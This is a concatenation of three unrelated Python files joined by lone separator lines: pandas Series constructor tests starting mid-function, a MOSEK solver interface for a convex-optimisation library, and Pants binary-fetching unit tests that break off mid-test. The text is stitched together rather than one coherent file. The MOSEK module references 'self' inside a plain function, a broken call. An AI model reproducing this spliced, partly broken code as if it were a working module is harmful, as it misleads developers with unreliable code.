df = pd.DataFrame(
{'wing1': wing1,
'wing2': wing2,
'mat': mat}, index=belly)
result = df.loc['3T19']
assert result.dtype == object
result = df.loc['216']
assert result.dtype == object
def test_constructor_datetimes_with_nulls(self):
# gh-15869
for arr in [np.array([None, None, None, None,
datetime.now(), None]),
np.array([None, None, datetime.now(), None])]:
result = Series(arr)
assert result.dtype == 'M8[ns]'
def test_constructor_dtype_datetime64(self):
s = Series(iNaT, dtype='M8[ns]', index=lrange(5))
assert isna(s).all()
# in theory this should be all nulls, but since
# we are not specifying a dtype is ambiguous
s = Series(iNaT, index=lrange(5))
assert not isna(s).all()
s = Series(nan, dtype='M8[ns]', index=lrange(5))
assert isna(s).all()
s = Series([datetime(2001, 1, 2, 0, 0), iNaT], dtype='M8[ns]')
assert isna(s[1])
assert s.dtype == 'M8[ns]'
s = Series([datetime(2001, 1, 2, 0, 0), nan], dtype='M8[ns]')
assert isna(s[1])
assert s.dtype == 'M8[ns]'
# GH3416
dates = [
np.datetime64(datetime(2013, 1, 1)),
np.datetime64(datetime(2013, 1, 2)),
np.datetime64(datetime(2013, 1, 3)),
]
s = Series(dates)
assert s.dtype == 'M8[ns]'
s.iloc[0] = np.nan
assert s.dtype == 'M8[ns]'
# invalid astypes
for t in ['s', 'D', 'us', 'ms']:
pytest.raises(TypeError, s.astype, 'M8[%s]' % t)
# GH3414 related
pytest.raises(TypeError, lambda x: Series(
Series(dates).astype('int') / 1000000, dtype='M8[ms]'))
pytest.raises(TypeError,
lambda x: Series(dates, dtype='datetime64'))
# invalid dates can be help as object
result = Series([datetime(2, 1, 1)])
assert result[0] == datetime(2, 1, 1, 0, 0)
result = Series([datetime(3000, 1, 1)])
assert result[0] == datetime(3000, 1, 1, 0, 0)
# don't mix types
result = Series([Timestamp('20130101'), 1], index=['a', 'b'])
assert result['a'] == Timestamp('20130101')
assert result['b'] == 1
# GH6529
# coerce datetime64 non-ns properly
dates = date_range('01-Jan-2015', '01-Dec-2015', freq='M')
values2 = dates.view(np.ndarray).astype('datetime64[ns]')
expected = Series(values2, index=dates)
for dtype in ['s', 'D', 'ms', 'us', 'ns']:
values1 = dates.view(np.ndarray).astype('M8[{0}]'.format(dtype))
result = Series(values1, dates)
assert_series_equal(result, expected)
# GH 13876
# coerce to non-ns to object properly
expected = Series(values2, index=dates, dtype=object)
for dtype in ['s', 'D', 'ms', 'us', 'ns']:
values1 = dates.view(np.ndarray).astype('M8[{0}]'.format(dtype))
result = Series(values1, index=dates, dtype=object)
assert_series_equal(result, expected)
# leave datetime.date alone
dates2 = np.array([d.date() for d in dates.to_pydatetime()],
dtype=object)
series1 = Series(dates2, dates)
tm.assert_numpy_array_equal(series1.values, dates2)
assert series1.dtype == object
# these will correctly infer a datetime
s = Series([None, pd.NaT, '2013-08-05 15:30:00.000001'])
assert s.dtype == 'datetime64[ns]'
s = Series([np.nan, pd.NaT, '2013-08-05 15:30:00.000001'])
assert s.dtype == 'datetime64[ns]'
s = Series([pd.NaT, None, '2013-08-05 15:30:00.000001'])
assert s.dtype == 'datetime64[ns]'
s = Series([pd.NaT, np.nan, '2013-08-05 15:30:00.000001'])
assert s.dtype == 'datetime64[ns]'
# tz-aware (UTC and other tz's)
# GH 8411
dr = date_range('20130101', periods=3)
assert Series(dr).iloc[0].tz is None
dr = date_range('20130101', periods=3, tz='UTC')
assert str(Series(dr).iloc[0].tz) == 'UTC'
dr = date_range('20130101', periods=3, tz='US/Eastern')
assert str(Series(dr).iloc[0].tz) == 'US/Eastern'
# non-convertible
s = Series([1479596223000, -1479590, pd.NaT])
assert s.dtype == 'object'
assert s[2] is pd.NaT
assert 'NaT' in str(s)
# if we passed a NaT it remains
s = Series([datetime(2010, 1, 1), datetime(2, 1, 1), pd.NaT])
assert s.dtype == 'object'
assert s[2] is pd.NaT
assert 'NaT' in str(s)
# if we passed a nan it remains
s = Series([datetime(2010, 1, 1), datetime(2, 1, 1), np.nan])
assert s.dtype == 'object'
assert s[2] is np.nan
assert 'NaN' in str(s)
def test_constructor_with_datetime_tz(self):
# 8260
# support datetime64 with tz
dr = date_range('20130101', periods=3, tz='US/Eastern')
s = Series(dr)
assert s.dtype.name == 'datetime64[ns, US/Eastern]'
assert s.dtype == 'datetime64[ns, US/Eastern]'
assert is_datetime64tz_dtype(s.dtype)
assert 'datetime64[ns, US/Eastern]' in str(s)
# export
result = s.values
assert isinstance(result, np.ndarray)
assert result.dtype == 'datetime64[ns]'
exp = pd.DatetimeIndex(result)
exp = exp.tz_localize('UTC').tz_convert(tz=s.dt.tz)
tm.assert_index_equal(dr, exp)
# indexing
result = s.iloc[0]
assert result == Timestamp('2013-01-01 00:00:00-0500',
tz='US/Eastern', freq='D')
result = s[0]
assert result == Timestamp('2013-01-01 00:00:00-0500',
tz='US/Eastern', freq='D')
result = s[Series([True, True, False], index=s.index)]
assert_series_equal(result, s[0:2])
result = s.iloc[0:1]
assert_series_equal(result, Series(dr[0:1]))
# concat
result = pd.concat([s.iloc[0:1], s.iloc[1:]])
assert_series_equal(result, s)
# astype
result = s.astype(object)
expected = Series(DatetimeIndex(s._values).asobject)
assert_series_equal(result, expected)
result = Series(s.values).dt.tz_localize('UTC').dt.tz_convert(s.dt.tz)
assert_series_equal(result, s)
# astype - datetime64[ns, tz]
result = Series(s.values).astype('datetime64[ns, US/Eastern]')
assert_series_equal(result, s)
result = Series(s.values).astype(s.dtype)
assert_series_equal(result, s)
result = s.astype('datetime64[ns, CET]')
expected = Series(date_range('20130101 06:00:00', periods=3, tz='CET'))
assert_series_equal(result, expected)
# short str
assert 'datetime64[ns, US/Eastern]' in str(s)
# formatting with NaT
result = s.shift()
assert 'datetime64[ns, US/Eastern]' in str(result)
assert 'NaT' in str(result)
# long str
t = Series(date_range('20130101', periods=1000, tz='US/Eastern'))
assert 'datetime64[ns, US/Eastern]' in str(t)
result = pd.DatetimeIndex(s, freq='infer')
tm.assert_index_equal(result, dr)
# inference
s = Series([pd.Timestamp('2013-01-01 13:00:00-0800', tz='US/Pacific'),
pd.Timestamp('2013-01-02 14:00:00-0800', tz='US/Pacific')])
assert s.dtype == 'datetime64[ns, US/Pacific]'
assert lib.infer_dtype(s) == 'datetime64'
s = Series([pd.Timestamp('2013-01-01 13:00:00-0800', tz='US/Pacific'),
pd.Timestamp('2013-01-02 14:00:00-0800', tz='US/Eastern')])
assert s.dtype == 'object'
assert lib.infer_dtype(s) == 'datetime'
# with all NaT
s = Series(pd.NaT, index=[0, 1], dtype='datetime64[ns, US/Eastern]')
expected = Series(pd.DatetimeIndex(['NaT', 'NaT'], tz='US/Eastern'))
assert_series_equal(s, expected)
def test_construction_interval(self):
# construction from interval & array of intervals
index = IntervalIndex.from_breaks(np.arange(3), closed='right')
result = Series(index)
repr(result)
str(result)
tm.assert_index_equal(Index(result.values), index)
result = Series(index.values)
tm.assert_index_equal(Index(result.values), index)
def test_construction_consistency(self):
# make sure that we are not re-localizing upon construction
# GH 14928
s = Series(pd.date_range('20130101', periods=3, tz='US/Eastern'))
result = Series(s, dtype=s.dtype)
tm.assert_series_equal(result, s)
result = Series(s.dt.tz_convert('UTC'), dtype=s.dtype)
tm.assert_series_equal(result, s)
result = Series(s.values, dtype=s.dtype)
tm.assert_series_equal(result, s)
def test_constructor_periodindex(self):
# GH7932
# converting a PeriodIndex when put in a Series
pi = period_range('20130101', periods=5, freq='D')
s = Series(pi)
expected = Series(pi.asobject)
assert_series_equal(s, expected)
assert s.dtype == 'object'
def test_constructor_dict(self):
d = {'a': 0., 'b': 1., 'c': 2.}
result = Series(d, index=['b', 'c', 'd', 'a'])
expected = Series([1, 2, nan, 0], index=['b', 'c', 'd', 'a'])
assert_series_equal(result, expected)
pidx = tm.makePeriodIndex(100)
d = {pidx[0]: 0, pidx[1]: 1}
result = Series(d, index=pidx)
expected = Series(np.nan, pidx)
expected.iloc[0] = 0
expected.iloc[1] = 1
assert_series_equal(result, expected)
def test_constructor_dict_datetime64_index(self):
# GH 9456
dates_as_str = ['1984-02-19', '1988-11-06', '1989-12-03', '1990-03-15']
values = [42544017.198965244, 1234565, 40512335.181958228, -1]
def create_data(constructor):
return dict(zip((constructor(x) for x in dates_as_str), values))
data_datetime64 = create_data(np.datetime64)
data_datetime = create_data(lambda x: datetime.strptime(x, '%Y-%m-%d'))
data_Timestamp = create_data(Timestamp)
expected = Series(values, (Timestamp(x) for x in dates_as_str))
result_datetime64 = Series(data_datetime64)
result_datetime = Series(data_datetime)
result_Timestamp = Series(data_Timestamp)
assert_series_equal(result_datetime64, expected)
assert_series_equal(result_datetime, expected)
assert_series_equal(result_Timestamp, expected)
def test_constructor_list_of_tuples(self):
data = [(1, 1), (2, 2), (2, 3)]
s = Series(data)
assert list(s) == data
def test_constructor_tuple_of_tuples(self):
data = ((1, 1), (2, 2), (2, 3))
s = Series(data)
assert tuple(s) == data
def test_constructor_set(self):
values = set([1, 2, 3, 4, 5])
pytest.raises(TypeError, Series, values)
values = frozenset(values)
pytest.raises(TypeError, Series, values)
def test_fromDict(self):
data = {'a': 0, 'b': 1, 'c': 2, 'd': 3}
series = Series(data)
assert tm.is_sorted(series.index)
data = {'a': 0, 'b': '1', 'c': '2', 'd': datetime.now()}
series = Series(data)
assert series.dtype == np.object_
data = {'a': 0, 'b': '1', 'c': '2', 'd': '3'}
series = Series(data)
assert series.dtype == np.object_
data = {'a': '0', 'b': '1'}
series = Series(data, dtype=float)
assert series.dtype == np.float64
def test_fromValue(self):
nans = Series(np.NaN, index=self.ts.index)
assert nans.dtype == np.float_
assert len(nans) == len(self.ts)
strings = Series('foo', index=self.ts.index)
assert strings.dtype == np.object_
assert len(strings) == len(self.ts)
d = datetime.now()
dates = Series(d, index=self.ts.index)
assert dates.dtype == 'M8[ns]'
assert len(dates) == len(self.ts)
# GH12336
# Test construction of categorical series from value
categorical = Series(0, index=self.ts.index, dtype="category")
expected = Series(0, index=self.ts.index).astype("category")
assert categorical.dtype == 'category'
assert len(categorical) == len(self.ts)
tm.assert_series_equal(categorical, expected)
def test_constructor_dtype_timedelta64(self):
# basic
td = Series([timedelta(days=i) for i in range(3)])
assert td.dtype == 'timedelta64[ns]'
td = Series([timedelta(days=1)])
assert td.dtype == 'timedelta64[ns]'
td = Series([timedelta(days=1), timedelta(days=2), np.timedelta64(
1, 's')])
assert td.dtype == 'timedelta64[ns]'
# mixed with NaT
td = Series([timedelta(days=1), NaT], dtype='m8[ns]')
assert td.dtype == 'timedelta64[ns]'
td = Series([timedelta(days=1), np.nan], dtype='m8[ns]')
assert td.dtype == 'timedelta64[ns]'
td = Series([np.timedelta64(300000000), pd.NaT], dtype='m8[ns]')
assert td.dtype == 'timedelta64[ns]'
# improved inference
# GH5689
td = Series([np.timedelta64(300000000), NaT])
assert td.dtype == 'timedelta64[ns]'
# because iNaT is int, not coerced to timedelta
td = Series([np.timedelta64(300000000), iNaT])
assert td.dtype == 'object'
td = Series([np.timedelta64(300000000), np.nan])
assert td.dtype == 'timedelta64[ns]'
td = Series([pd.NaT, np.timedelta64(300000000)])
assert td.dtype == 'timedelta64[ns]'
td = Series([np.timedelta64(1, 's')])
assert td.dtype == 'timedelta64[ns]'
# these are frequency conversion astypes
# for t in ['s', 'D', 'us', 'ms']:
# pytest.raises(TypeError, td.astype, 'm8[%s]' % t)
# valid astype
td.astype('int64')
# invalid casting
pytest.raises(TypeError, td.astype, 'int32')
# this is an invalid casting
def f():
Series([timedelta(days=1), 'foo'], dtype='m8[ns]')
pytest.raises(Exception, f)
# leave as object here
td = Series([timedelta(days=i) for i in range(3)] + ['foo'])
assert td.dtype == 'object'
# these will correctly infer a timedelta
s = Series([None, pd.NaT, '1 Day'])
assert s.dtype == 'timedelta64[ns]'
s = Series([np.nan, pd.NaT, '1 Day'])
assert s.dtype == 'timedelta64[ns]'
s = Series([pd.NaT, None, '1 Day'])
assert s.dtype == 'timedelta64[ns]'
s = Series([pd.NaT, np.nan, '1 Day'])
assert s.dtype == 'timedelta64[ns]'
def test_NaT_scalar(self):
series = Series([0, 1000, 2000, iNaT], dtype='M8[ns]')
val = series[3]
assert isna(val)
series[2] = val
assert isna(series[2])
def test_NaT_cast(self):
# GH10747
result = Series([np.nan]).astype('M8[ns]')
expected = Series([NaT])
assert_series_equal(result, expected)
def test_constructor_name_hashable(self):
for n in [777, 777., 'name', datetime(2001, 11, 11), (1, ), u"\u05D0"]:
for data in [[1, 2, 3], np.ones(3), {'a': 0, 'b': 1}]:
s = Series(data, name=n)
assert s.name == n
def test_constructor_name_unhashable(self):
for n in [['name_list'], np.ones(2), {1: 2}]:
for data in [['name_list'], np.ones(2), {1: 2}]:
pytest.raises(TypeError, Series, data, name=n)
def test_auto_conversion(self):
series = Series(list(date_range('1/1/2000', periods=10)))
assert series.dtype == 'M8[ns]'
def test_constructor_cant_cast_datetime64(self):
msg = "Cannot cast datetime64 to "
with tm.assert_raises_regex(TypeError, msg):
Series(date_range('1/1/2000', periods=10), dtype=float)
with tm.assert_raises_regex(TypeError, msg):
Series(date_range('1/1/2000', periods=10), dtype=int)
def test_constructor_cast_object(self):
s = Series(date_range('1/1/2000', periods=10), dtype=object)
exp = Series(date_range('1/1/2000', periods=10))
tm.assert_series_equal(s, exp)
def test_constructor_generic_timestamp_deprecated(self):
# see gh-15524
with tm.assert_produces_warning(FutureWarning):
dtype = np.timedelta64
s = Series([], dtype=dtype)
assert s.empty
assert s.dtype == 'm8[ns]'
with tm.assert_produces_warning(FutureWarning):
dtype = np.datetime64
s = Series([], dtype=dtype)
assert s.empty
assert s.dtype == 'M8[ns]'
# These timestamps have the wrong frequencies,
# so an Exception should be raised now.
msg = "cannot convert timedeltalike"
with tm.assert_raises_regex(TypeError, msg):
Series([], dtype='m8[ps]')
msg = "cannot convert datetimelike"
with tm.assert_raises_regex(TypeError, msg):
Series([], dtype='M8[ps]')
@pytest.mark.parametrize('dtype', [None, 'uint8', 'category'])
def test_constructor_range_dtype(self, dtype):
# GH 16804
expected = Series([0, 1, 2, 3, 4], dtype=dtype or 'int64')
result = Series(range(5), dtype=dtype)
tm.assert_series_equal(result, expected)
|
|
"""
Copyright 2015 Enzo Busseti
[ Modified by Balasubramanian Narasimhan ]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import settings as s
import numpy as np
import scipy.sparse as sp
import mosek
def mosek_intf(A, b, G, h, c, dims, offset, solver_opts, verbose = False):
data = {s.A : A,
s.B : b,
s.G : G,
s.H : h,
s.C : c,
s.OFFSET : offset,
s.DIMS : dims}
with mosek.Env() as env:
with env.Task(0, 0) as task:
kwargs = sorted(solver_opts.keys())
if "mosek_params" in kwargs:
self._handle_mosek_params(task, solver_opts["mosek_params"])
kwargs.remove("mosek_params")
if kwargs:
raise ValueError("Invalid keyword-argument '%s'" % kwargs[0])
if verbose:
# Define a stream printer to grab output from MOSEK
def streamprinter(text):
import sys
sys.stdout.write(text)
sys.stdout.flush()
env.set_Stream(mosek.streamtype.log, streamprinter)
task.set_Stream(mosek.streamtype.log, streamprinter)
# size of problem
numvar = len(c) + sum(dims[s.SOC_DIM])
numcon = len(b) + dims[s.LEQ_DIM] + sum(dims[s.SOC_DIM]) + \
sum([el**2 for el in dims[s.SDP_DIM]])
# otherwise it crashes on empty probl.
if numvar == 0:
result_dict = {s.STATUS: s.OPTIMAL}
result_dict[s.PRIMAL] = []
result_dict[s.VALUE] = 0. + data[s.OFFSET]
result_dict[s.EQ_DUAL] = []
result_dict[s.INEQ_DUAL] = []
return result_dict
# objective
task.appendvars(numvar)
task.putclist(np.arange(len(c)), c)
task.putvarboundlist(np.arange(numvar, dtype=int),
[mosek.boundkey.fr]*numvar,
np.zeros(numvar),
np.zeros(numvar))
# SDP variables
if sum(dims[s.SDP_DIM]) > 0:
task.appendbarvars(dims[s.SDP_DIM])
# linear equality and linear inequality constraints
task.appendcons(numcon)
if A.shape[0] and G.shape[0]:
constraints_matrix = sp.bmat([[A], [G]])
else:
constraints_matrix = A if A.shape[0] else G
coefficients = np.concatenate([b, h])
row, col, el = sp.find(constraints_matrix)
task.putaijlist(row, col, el)
type_constraint = [mosek.boundkey.fx] * len(b)
type_constraint += [mosek.boundkey.up] * dims[s.LEQ_DIM]
sdp_total_dims = sum([cdim**2 for cdim in dims[s.SDP_DIM]])
type_constraint += [mosek.boundkey.fx] * \
(sum(dims[s.SOC_DIM]) + sdp_total_dims)
task.putconboundlist(np.arange(numcon, dtype=int),
type_constraint,
coefficients,
coefficients)
# cones
current_var_index = len(c)
current_con_index = len(b) + dims[s.LEQ_DIM]
for size_cone in dims[s.SOC_DIM]:
row, col, el = sp.find(sp.eye(size_cone))
row += current_con_index
col += current_var_index
task.putaijlist(row, col, el) # add a identity for each cone
# add a cone constraint
task.appendcone(mosek.conetype.quad,
0.0, # unused
np.arange(current_var_index,
current_var_index + size_cone))
current_con_index += size_cone
current_var_index += size_cone
# SDP
for num_sdp_var, size_matrix in enumerate(dims[s.SDP_DIM]):
for i_sdp_matrix in range(size_matrix):
for j_sdp_matrix in range(size_matrix):
coeff = 1. if i_sdp_matrix == j_sdp_matrix else .5
task.putbaraij(current_con_index,
num_sdp_var,
[task.appendsparsesymmat(size_matrix,
[max(i_sdp_matrix,
j_sdp_matrix)],
[min(i_sdp_matrix,
j_sdp_matrix)],
[coeff])],
[1.0])
current_con_index += 1
# solve
task.putobjsense(mosek.objsense.minimize)
task.optimize()
if verbose:
task.solutionsummary(mosek.streamtype.msg)
return format_results(task, data)
def choose_solution(task):
"""Chooses between the basic and interior point solution.
Parameters
----------
task : mosek.Task
The solver status interface.
Returns
-------
soltype
The preferred solution (mosek.soltype.*)
solsta
The status of the preferred solution (mosek.solsta.*)
"""
import mosek
def rank(status):
# Rank solutions
# optimal > near_optimal > anything else > None
if status == mosek.solsta.optimal:
return 3
elif status == mosek.solsta.near_optimal:
return 2
elif status is not None:
return 1
else:
return 0
solsta_bas, solsta_itr = None, None
if task.solutiondef(mosek.soltype.bas):
solsta_bas = task.getsolsta(mosek.soltype.bas)
if task.solutiondef(mosek.soltype.itr):
solsta_itr = task.getsolsta(mosek.soltype.itr)
# As long as interior solution is not worse, take it
# (for backward compatibility)
if rank(solsta_itr) >= rank(solsta_bas):
return mosek.soltype.itr, solsta_itr
else:
return mosek.soltype.bas, solsta_bas
def format_results(task, data):
"""Converts the solver output into standard form.
Parameters
----------
task : mosek.Task
The solver status interface.
data : dict
Information about the problem.
Returns
-------
dict
The solver output in standard form.
"""
import mosek
# Map of MOSEK status to CVXPY status.
# taken from:
# http://docs.mosek.com/7.0/pythonapi/Solution_status_keys.html
STATUS_MAP = {mosek.solsta.optimal: s.OPTIMAL,
mosek.solsta.prim_infeas_cer: s.INFEASIBLE,
mosek.solsta.dual_infeas_cer: s.UNBOUNDED,
mosek.solsta.near_optimal: s.OPTIMAL_INACCURATE,
mosek.solsta.near_prim_infeas_cer: s.INFEASIBLE_INACCURATE,
mosek.solsta.near_dual_infeas_cer: s.UNBOUNDED_INACCURATE,
mosek.solsta.unknown: s.SOLVER_ERROR}
soltype, solsta = choose_solution(task)
if solsta in STATUS_MAP:
result_dict = {s.STATUS: STATUS_MAP[solsta]}
else:
result_dict = {s.STATUS: s.SOLVER_ERROR}
# Callback data example:
# http://docs.mosek.com/7.1/pythonapi/The_progress_call-back.html
# Retrieving double information items:
# http://docs.mosek.com/7.1/pythonapi/Task_getdouinf_.html#@generated-ID:5ef16e0
# http://docs.mosek.com/7.1/pythonapi/Double_information_items.html
result_dict[s.SOLVE_TIME] = task.getdouinf(mosek.dinfitem.optimizer_time)
result_dict[s.SETUP_TIME] = task.getdouinf(mosek.dinfitem.presolve_time)
result_dict[s.NUM_ITERS] = task.getintinf(mosek.iinfitem.intpnt_iter)
if result_dict[s.STATUS] in s.SOLUTION_PRESENT:
# get primal variables values
result_dict[s.PRIMAL] = np.zeros(task.getnumvar(), dtype=np.float)
task.getxx(soltype, result_dict[s.PRIMAL])
# get obj value
result_dict[s.VALUE] = task.getprimalobj(soltype) + \
data[s.OFFSET]
# get dual
y = np.zeros(task.getnumcon(), dtype=np.float)
task.gety(soltype, y)
# it appears signs are inverted
result_dict[s.EQ_DUAL] = -y[:len(data[s.B])]
result_dict[s.INEQ_DUAL] = \
-y[len(data[s.B]):len(data[s.B])+data[s.DIMS][s.LEQ_DIM]]
return result_dict
def _handle_mosek_params(task, params):
if params is None:
return
import mosek
def _handle_str_param(param, value):
if param.startswith("MSK_DPAR_"):
task.putnadouparam(param, value)
elif param.startswith("MSK_IPAR_"):
task.putnaintparam(param, value)
elif param.startswith("MSK_SPAR_"):
task.putnastrparam(param, value)
else:
raise ValueError("Invalid MOSEK parameter '%s'." % param)
def _handle_enum_param(param, value):
if isinstance(param, mosek.dparam):
task.putdouparam(param, value)
elif isinstance(param, mosek.iparam):
task.putintparam(param, value)
elif isinstance(param, mosek.sparam):
task.putstrparam(param, value)
else:
raise ValueError("Invalid MOSEK parameter '%s'." % param)
for param, value in params.items():
if isinstance(param, str):
_handle_str_param(param.strip(), value)
else:
_handle_enum_param(param, value)
|
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import glob
import logging
import os
import unittest.mock
from pants.binaries.binary_util import (
BinaryRequest,
BinaryToolFetcher,
BinaryToolUrlGenerator,
BinaryUtil,
select,
)
from pants.net.http.fetcher import Fetcher
from pants.testutil.test_base import TestBase
from pants.util.collections import assert_single_element
from pants.util.contextutil import environment_as, temporary_dir
from pants.util.dirutil import is_readable_dir, safe_file_dump, safe_open
logger = logging.getLogger(__name__)
class ExternalUrlGenerator(BinaryToolUrlGenerator):
def generate_urls(self, version, host_platform):
return ["https://www.pantsbuild.org/some-binary", "https://www.pantsbuild.org/same-binary"]
# Make the __str__ deterministic, for testing exception messages.
def __repr__(self):
return "ExternalUrlGenerator(<example __str__()>)"
# TODO: test requests with an archiver!
class BinaryUtilTest(TestBase):
"""Tests binary_util's binaries_baseurls handling."""
class MapFetcher:
"""Class which pretends to be a pants.net.http.Fetcher, but is actually a dictionary."""
def __init__(self, read_map):
self._map = read_map
def download(self, url, path_or_fd=None, **kwargs):
if not url in self._map:
raise IOError(f"404: Virtual URL '{url}' does not exist.")
if not path_or_fd:
raise AssertionError("Expected path_or_fd to be set")
path_or_fd.write(self._map[url])
return path_or_fd
def keys(self):
return list(self._map.keys())
def values(self):
return list(self._map.values())
def __getitem__(self, key):
return self._map[key] # Vanilla internal map access (without lambda shenanigans).
@classmethod
def _fake_base(cls, name):
return f"fake-url-{name}"
@classmethod
def _fake_url(cls, binaries, base, binary_key):
binary_util = cls._gen_binary_util()
supportdir, version, name = binaries[binary_key]
binary_request = binary_util._make_deprecated_binary_request(supportdir, version, name)
binary_path = binary_request.get_download_path(binary_util.host_platform())
return f"{base}/{binary_path}"
@classmethod
def _gen_binary_tool_fetcher(
cls, bootstrap_dir="/tmp", timeout_secs=30, fetcher=None, ignore_cached_download=True
):
return BinaryToolFetcher(
bootstrap_dir=bootstrap_dir,
timeout_secs=timeout_secs,
fetcher=fetcher,
ignore_cached_download=ignore_cached_download,
)
@classmethod
def _gen_binary_util(
cls,
baseurls=[],
path_by_id=None,
allow_external_binary_tool_downloads=True,
uname_func=None,
**kwargs,
):
return BinaryUtil(
baseurls=baseurls,
binary_tool_fetcher=cls._gen_binary_tool_fetcher(**kwargs),
path_by_id=path_by_id,
allow_external_binary_tool_downloads=allow_external_binary_tool_downloads,
uname_func=uname_func,
)
@classmethod
def _read_file(cls, file_path):
with open(file_path, "rb") as result_file:
return result_file.read()
def test_timeout(self):
fetcher = unittest.mock.create_autospec(Fetcher, spec_set=True)
timeout_value = 42
binary_util = self._gen_binary_util(
baseurls=["http://binaries.example.com"], timeout_secs=timeout_value, fetcher=fetcher
)
self.assertFalse(fetcher.download.called)
fetch_path = binary_util.select_script(
supportdir="a-binary", version="v1.2", name="a-binary"
)
logger.debug(f"fetch_path: {fetch_path}")
fetcher.download.assert_called_once_with(
"http://binaries.example.com/a-binary/v1.2/a-binary",
listener=unittest.mock.ANY,
path_or_fd=unittest.mock.ANY,
timeout_secs=timeout_value,
)
def test_no_base_urls_error(self):
"""Tests exception handling if build support urls are improperly specified."""
binary_util = self._gen_binary_util()
with self.assertRaises(BinaryUtil.BinaryResolutionError) as cm:
binary_util.select_script("supportdir", "version", "name")
the_raised_exception_message = str(cm.exception)
self.assertIn(BinaryUtil.NoBaseUrlsError.__name__, the_raised_exception_message)
expected_msg = (
"Error resolving binary request BinaryRequest(supportdir='supportdir', version='version', "
"name='name', platform_dependent=False, external_url_generator=None, archiver=None): "
"--binaries-baseurls is empty."
)
self.assertIn(expected_msg, the_raised_exception_message)
def test_support_url_multi(self):
"""Tests to make sure existing base urls function as expected."""
bootstrap_dir = "/tmp"
with temporary_dir() as invalid_local_files, temporary_dir() as valid_local_files:
binary_util = self._gen_binary_util(
baseurls=[
"BLATANTLY INVALID URL",
"https://dl.bintray.com/pantsbuild/bin/reasonably-invalid-url",
invalid_local_files,
valid_local_files,
"https://dl.bintray.com/pantsbuild/bin/another-invalid-url",
],
bootstrap_dir=bootstrap_dir,
)
binary_request = binary_util._make_deprecated_binary_request(
supportdir="bin/protobuf", version="2.4.1", name="protoc"
)
binary_path = binary_request.get_download_path(binary_util.host_platform())
contents = b"proof"
with safe_open(os.path.join(valid_local_files, binary_path), "wb") as fp:
fp.write(contents)
binary_path_abs = os.path.join(bootstrap_dir, binary_path)
self.assertEqual(
os.path.realpath(binary_path_abs),
os.path.realpath(binary_util.select(binary_request)),
)
self.assertEqual(contents, self._read_file(binary_path_abs))
def test_support_url_fallback(self):
"""Tests fallback behavior with multiple support baseurls.
Mocks up some dummy baseurls and then swaps out the URL reader to make sure urls are
accessed and others are not.
"""
fake_base, fake_url = self._fake_base, self._fake_url
bases = [fake_base("apple"), fake_base("orange"), fake_base("banana")]
binaries = {
t[2]: t
for t in (
("bin/protobuf", "2.4.1", "protoc"),
("bin/ivy", "4.3.7", "ivy"),
("bin/bash", "4.4.3", "bash"),
)
}
fetcher = self.MapFetcher(
{
fake_url(binaries, bases[0], "protoc"): b"SEEN PROTOC",
fake_url(binaries, bases[0], "ivy"): b"SEEN IVY",
fake_url(binaries, bases[1], "bash"): b"SEEN BASH",
fake_url(binaries, bases[1], "protoc"): b"UNSEEN PROTOC 1",
fake_url(binaries, bases[2], "protoc"): b"UNSEEN PROTOC 2",
fake_url(binaries, bases[2], "ivy"): b"UNSEEN IVY 2",
}
)
binary_util = self._gen_binary_util(baseurls=bases, fetcher=fetcher)
unseen = [item for item in fetcher.values() if item.startswith(b"SEEN ")]
for supportdir, version, name in binaries.values():
binary_path_abs = binary_util.select_binary(
supportdir=supportdir, version=version, name=name
)
expected_content = f"SEEN {name.upper()}".encode()
self.assertEqual(expected_content, self._read_file(binary_path_abs))
unseen.remove(expected_content)
self.assertEqual(0, len(unseen)) # Make sure we've seen all the SEENs.
def test_select_binary_base_path_linux(self):
def uname_func():
return "linux", "dontcare1", "dontcare2", "dontcare3", "amd64"
binary_util = self._gen_binary_util(uname_func=uname_func)
binary_request = binary_util._make_deprecated_binary_request(
"supportdir", "version", "name"
)
self.assertEqual(
"supportdir/linux/x86_64/version/name", binary_util._get_download_path(binary_request)
)
def test_select_binary_base_path_darwin(self):
def uname_func():
return (
"darwin",
"dontcare1",
"14.9",
"dontcare2",
"dontcare3",
)
binary_util = self._gen_binary_util(uname_func=uname_func)
binary_request = binary_util._make_deprecated_binary_request(
"supportdir", "version", "name"
)
self.assertEqual(
"supportdir/mac/10.10/version/name", binary_util._get_download_path(binary_request)
)
def test_select_binary_base_path_missing_os(self):
def uname_func():
return "vms", "dontcare1", "999.9", "dontcare2", "VAX9"
binary_util = self._gen_binary_util(uname_func=uname_func)
with self.assertRaises(BinaryUtil.BinaryResolutionError) as cm:
binary_util.select_binary("supportdir", "version", "name")
the_raised_exception_message = str(cm.exception)
self.assertIn(BinaryUtil.MissingMachineInfo.__name__, the_raised_exception_message)
expected_msg = (
"Error resolving binary request BinaryRequest(supportdir='supportdir', version='version', "
"name='name', platform_dependent=True, external_url_generator=None, archiver=None): "
"Pants could not resolve binaries for the current host: platform 'vms' was not recognized. "
"Recognized platforms are: [darwin, linux]."
)
self.assertIn(expected_msg, the_raised_exception_message)
def test_select_binary_base_path_missing_arch(self):
def uname_func():
return "linux", "dontcare1", "don'tcare2", "dontcare3", "quantum_computer"
binary_util = self._gen_binary_util(uname_func=uname_func)
with self.assertRaises(BinaryUtil.BinaryResolutionError) as cm:
binary_util.select_binary("mysupportdir", "myversion", "myname")
the_raised_exception_message = str(cm.exception)
self.assertIn(BinaryUtil.MissingMachineInfo.__name__, the_raised_exception_message)
expected_msg = (
"Error resolving binary request BinaryRequest(supportdir='mysupportdir', version='myversion', "
"name='myname', platform_dependent=True, external_url_generator=None, archiver=None): "
"Pants could not resolve binaries for the current host. Update --binaries-path-by-id to "
"find binaries for the current host platform ('linux', "
"'quantum_computer').\\n--binaries-path-by-id was:"
)
self.assertIn(expected_msg, the_raised_exception_message)
def test_select_script_missing_arch(self):
def uname_func():
return "linux", "dontcare1", "dontcare2", "dontcare3", "quantum_computer"
binary_util = self._gen_binary_util(uname_func=uname_func)
with self.assertRaises(BinaryUtil.BinaryResolutionError) as cm:
binary_util.select_script("mysupportdir", "myversion", "myname")
the_raised_exception_message = str(cm.exception)
